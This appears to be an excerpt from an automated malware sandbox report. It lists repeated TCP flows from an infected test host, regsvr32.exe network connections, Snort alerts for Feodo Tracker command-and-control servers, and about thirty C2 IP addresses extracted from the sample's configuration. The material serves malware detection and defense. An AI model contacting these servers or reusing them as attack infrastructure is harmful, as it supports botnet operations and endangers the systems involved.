                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49179 -> 218.38.121.17:443
                        Source: global trafficTCP traffic: 192.168.2.22:49179 -> 218.38.121.17:443
                        Source: global trafficTCP traffic: 192.168.2.22:49179 -> 218.38.121.17:443
                        Source: global trafficTCP traffic: 192.168.2.22:49179 -> 218.38.121.17:443
                        Source: global trafficTCP traffic: 192.168.2.22:49179 -> 218.38.121.17:443
                        Source: global trafficTCP traffic: 192.168.2.22:49179 -> 218.38.121.17:443
                        Source: global trafficTCP traffic: 192.168.2.22:49179 -> 218.38.121.17:443
                        Source: global trafficTCP traffic: 192.168.2.22:49179 -> 218.38.121.17:443
                        Source: global trafficTCP traffic: 192.168.2.22:49179 -> 218.38.121.17:443
                        Source: global trafficTCP traffic: 192.168.2.22:49179 -> 218.38.121.17:443
                        Source: global trafficTCP traffic: 192.168.2.22:49179 -> 218.38.121.17:443
                        Source: global trafficTCP traffic: 192.168.2.22:49179 -> 218.38.121.17:443
                        Source: global trafficTCP traffic: 192.168.2.22:49184 -> 218.38.121.17:443
                        Source: global trafficTCP traffic: 192.168.2.22:49184 -> 218.38.121.17:443
                        Source: global trafficTCP traffic: 192.168.2.22:49184 -> 218.38.121.17:443
                        Source: global trafficTCP traffic: 192.168.2.22:49184 -> 218.38.121.17:443
                        Source: global trafficTCP traffic: 192.168.2.22:49184 -> 218.38.121.17:443
                        Source: global trafficTCP traffic: 192.168.2.22:49184 -> 218.38.121.17:443
                        Source: global trafficTCP traffic: 192.168.2.22:49184 -> 218.38.121.17:443
                        Source: global trafficTCP traffic: 192.168.2.22:49184 -> 218.38.121.17:443
                        Source: global trafficTCP traffic: 192.168.2.22:49184 -> 218.38.121.17:443
                        Source: global trafficTCP traffic: 192.168.2.22:49184 -> 218.38.121.17:443
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49172 -> 163.172.108.69:80
                        Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.23.117.132:80
                        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.1.136.16:80

                        Networking

                        barindex
                        System process connects to network (likely due to code injection or exploit)
                        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 115.178.55.22 80
                        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 172.105.115.71 8080
                        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 218.38.121.17 443
                        Snort IDS alert for network traffic
                        Source: TrafficSnort IDS: 2404326 ET CNC Feodo Tracker Reported CnC Server TCP group 14 192.168.2.22:49179 -> 218.38.121.17:443
                        Source: TrafficSnort IDS: 2404304 ET CNC Feodo Tracker Reported CnC Server TCP group 3 192.168.2.22:49175 -> 115.178.55.22:80
                        C2 URLs / IPs found in malware configuration
                        Source: Malware configuration extractorIPs: 172.105.115.71:8080
                        Source: Malware configuration extractorIPs: 218.38.121.17:443
                        Source: Malware configuration extractorIPs: 186.250.48.5:443
                        Source: Malware configuration extractorIPs: 103.71.99.57:8080
                        Source: Malware configuration extractorIPs: 85.214.67.203:8080
                        Source: Malware configuration extractorIPs: 85.25.120.45:8080
                        Source: Malware configuration extractorIPs: 139.196.72.155:8080
                        Source: Malware configuration extractorIPs: 103.85.95.4:8080
                        Source: Malware configuration extractorIPs: 198.199.70.22:8080
                        Source: Malware configuration extractorIPs: 209.239.112.82:8080
                        Source: Malware configuration extractorIPs: 78.47.204.80:443
                        Source: Malware configuration extractorIPs: 36.67.23.59:443
                        Source: Malware configuration extractorIPs: 104.244.79.94:443
                        Source: Malware configuration extractorIPs: 62.171.178.147:8080
                        Source: Malware configuration extractorIPs: 195.77.239.39:8080
                        Source: Malware configuration extractorIPs: 103.56.149.105:8080
                        Source: Malware configuration extractorIPs: 80.211.107.116:8080
                        Source: Malware configuration extractorIPs: 93.104.209.107:8080
                        Source: Malware configuration extractorIPs: 174.138.33.49:7080
                        Source: Malware configuration extractorIPs: 202.28.34.99:8080
                        Source: Malware configuration extractorIPs: 178.62.112.199:8080
                        Source: Malware configuration extractorIPs: 114.79.130.68:443
                        Source: Malware configuration extractorIPs: 118.98.72.86:443
                        Source: Malware configuration extractorIPs: 103.41.204.169:8080
                        Source: Malware configuration extractorIPs: 178.238.225.252:8080
                        Source: Malware configuration extractorIPs: 83.229.80.93:8080
                        Source: Malware configuration extractorIPs: 46.101.98.60:8080
                        Source: Malware configuration extractorIPs: 82.98.180.154:7080
                        Source: Malware configuration extractorIPs: 87.106.97.83:7080
                        Source: Malware configuration extractorIPs: 196.44.98.190:8080
                        Source: Malware configuration extractorIPs: 139.59.80.108:8080
                        Source: Malware configuration extractorIPs: 103.224.241.74:8080
